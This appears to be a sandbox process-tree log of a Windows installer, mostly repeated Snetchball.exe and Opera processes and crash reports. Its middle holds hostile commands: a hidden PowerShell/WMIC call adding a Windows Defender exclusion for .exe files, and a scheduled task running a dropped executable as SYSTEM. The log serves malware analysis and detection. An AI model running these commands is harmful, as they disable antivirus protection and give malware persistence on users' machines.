C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4780 --field-trial-handle=2780,i,6767851087607454902,10111547737772532212,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 22004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18164⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18884⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exeC:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bpHydXXKbQRQpHUipK" /SC once /ST 13:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exe\" RR /JTkEdidFhu 757674 /S" /V1 /F5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 14405⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17604⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11924⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10444⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11244⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 19844⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10004⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11244⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 13284⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 15604⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18924⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 13004⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11924⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 13244⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21164⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 9964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21164⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11884⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10564⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18724⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=01⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xa79f88,0xa79f94,0xa79fa02⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2c0,0x2c4,0x2c8,0x2bc,0x2cc,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a84⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exeC:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x28c,0x290,0x294,0x250,0x298,0x5e38a0,0x5e38ac,0x5e38b83⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream4⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2d4,0x2d8,0x2dc,0x2d0,0x2e0,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a85⤵
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream4⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2d4,0x2d8,0x2dc,0x2d0,0x2e0,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a85⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks system information in the registry
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2b8,0x2bc,0x2c0,0x2b4,0x2c4,0x7ffbf27da488,0x7ffbf27da498,0x7ffbf27da4a82⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on 